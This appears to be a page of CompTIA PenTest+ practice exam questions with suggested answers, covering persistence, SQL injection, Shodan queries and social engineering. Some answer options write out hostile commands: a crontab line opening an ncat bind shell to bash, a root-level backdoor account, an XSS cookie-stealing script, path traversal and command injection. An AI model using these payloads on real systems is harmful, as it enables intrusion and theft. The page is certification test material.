ExamGecko
Search Search Login
Home Home / CompTIA / PT0-002

CompTIA PT0-002 Practice Test - Questions Answers, Page 12

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets. INSTRUCTIONS Select the appropriate answer(s), given the output from each section. Output 1
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
Given the following user-supplied data: www.comptia.com/info.php?id=1 AND 1=1 Which of the following attack techniques is the penetration tester likely implementing?
A penetration tester is reviewing the logs of a proxy server and discovers the following URLs: https://test.comptia.com/profile.php?userid=1546 https://test.cpmptia.com/profile.php?userid=5482 https://test.comptia.com/profile.php?userid=3618 Which of the following types of vulnerabilities should be remediated?
A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

Question 111

Report
Export
Collapse

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

A.
schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
A.
schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
Answers
B.
wmic startup get caption,command
B.
wmic startup get caption,command
Answers
C.
crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
C.
crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
Answers
D.
sudo useradd -ou 0 -g 0 user
D.
sudo useradd -ou 0 -g 0 user
Answers
Suggested answer: A

Question 112

Report
Export
Collapse

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?

A.
"cisco-ios" "admin+1234"
A.
"cisco-ios" "admin+1234"
Answers
B.
"cisco-ios" "no-password"
B.
"cisco-ios" "no-password"
Answers
C.
"cisco-ios" "default-passwords"
C.
"cisco-ios" "default-passwords"
Answers
D.
"cisco-ios" "last-modified"
D.
"cisco-ios" "last-modified"
Answers
Suggested answer: B

Question 113

Report
Export
Collapse

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

A.
<script>var adr= '../evil.php?test=' + escape(document.cookie);</script>
A.
<script>var adr= '../evil.php?test=' + escape(document.cookie);</script>
Answers
B.
../../../../../../../../../../etc/passwd
B.
../../../../../../../../../../etc/passwd
Answers
C.
/var/www/html/index.php;whoami
C.
/var/www/html/index.php;whoami
Answers
D.
1 UNION SELECT 1, DATABASE(),3--
D.
1 UNION SELECT 1, DATABASE(),3--
Answers
Suggested answer: D

Question 114

Report
Export
Collapse

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

A.
Deploy a user training program
A.
Deploy a user training program
Answers
B.
Implement a patch management plan
B.
Implement a patch management plan
Answers
C.
Utilize the secure software development life cycle
C.
Utilize the secure software development life cycle
Answers
D.
Configure access controls on each of the servers
D.
Configure access controls on each of the servers
Answers
Suggested answer: B

Question 115

Report
Export
Collapse

A company that developers embedded software for the automobile industry has hired a penetrationtesting team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

A.
The reverse-engineering team may have a history of selling exploits to third parties.
A.
The reverse-engineering team may have a history of selling exploits to third parties.
Answers
B.
The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
B.
The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
Answers
C.
The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
C.
The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
Answers
D.
The reverse-engineering team will be given access to source code for analysis.
D.
The reverse-engineering team will be given access to source code for analysis.
Answers
Suggested answer: A

Question 116

Report
Export
Collapse

A penetration tester has been given eight business hours to gain access to a client's financial system.

Which of the following techniques will have the highest likelihood of success?

A.
Attempting to tailgate an employee going into the client's workplace
A.
Attempting to tailgate an employee going into the client's workplace
Answers
B.
Dropping a malicious USB key with the company's logo in the parking lot
B.
Dropping a malicious USB key with the company's logo in the parking lot
Answers
C.
Using a brute-force attack against the external perimeter to gain a foothold
C.
Using a brute-force attack against the external perimeter to gain a foothold
Answers
D.
Performing spear phishing against employees by posing as senior management
D.
Performing spear phishing against employees by posing as senior management
Answers
Suggested answer: D

Question 117

Report
Export
Collapse

The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

A.
This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
A.
This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
Answers
B.
This device is most likely a gateway with in-band management services.
B.
This device is most likely a gateway with in-band management services.
Answers
C.
This device is most likely a proxy server forwarding requests over TCP/443.
C.
This device is most likely a proxy server forwarding requests over TCP/443.
Answers
D.
This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
D.
This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
Answers
Suggested answer: B

Explanation:

The heart bleed bug is an open ssl bug which does not affect SSH Ref: https://www.sosberlin.

com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh

Question 118

Report
Export
Collapse

Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

A.
To provide feedback on the report structure and recommend improvements
A.
To provide feedback on the report structure and recommend improvements
Answers
B.
To discuss the findings and dispute any false positives
B.
To discuss the findings and dispute any false positives
Answers
C.
To determine any processes that failed to meet expectations during the assessment
C.
To determine any processes that failed to meet expectations during the assessment
Answers
D.
To ensure the penetration-testing team destroys all company data that was gathered during the test
D.
To ensure the penetration-testing team destroys all company data that was gathered during the test
Answers
Suggested answer: C

Question 119

Report
Export
Collapse

A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

A.
Badge cloning
A.
Badge cloning
Answers
B.
Dumpster diving
B.
Dumpster diving
Answers
C.
Tailgating
C.
Tailgating
Answers
D.
Shoulder surfing
D.
Shoulder surfing
Answers
Suggested answer: B

Question 120

Report
Export
Collapse

The results of an Nmap scan are as follows:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST

Nmap scan report for ( 10.2.1.22 )

Host is up (0.0102s latency).

Not shown: 998 filtered ports

Port State Service

80/tcp open http

|_http-title: 80F 22% RH 1009.1MB (text/html)

|_http-slowloris-check:

| VULNERABLE:

| Slowloris DoS Attack

| <..>

Device type: bridge|general purpose

Running (JUST GUESSING) : QEMU (95%)

OS CPE: cpe:/a:qemu:qemu

No exact OS matches found for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/.

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Which of the following device types will MOST likely have a similar response? (Choose two.)

A.
Network device
A.
Network device
Answers
B.
Public-facing web server
B.
Public-facing web server
Answers
C.
Active Directory domain controller
C.
Active Directory domain controller
Answers
D.
IoT/embedded device
D.
IoT/embedded device
Answers
E.
Exposed RDP
E.
Exposed RDP
Answers
F.
Print queue
F.
Print queue
Answers
Suggested answer: B, D

Explanation:

https://www.netscout.com/what-is-ddos/slowloris-attacks

From the http-title in the output, this looks like an IoT device with RH implying Relative Humidity, that offers a web-based interface for visualizing the results.

Total 422 questions
Go to page: of 43
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms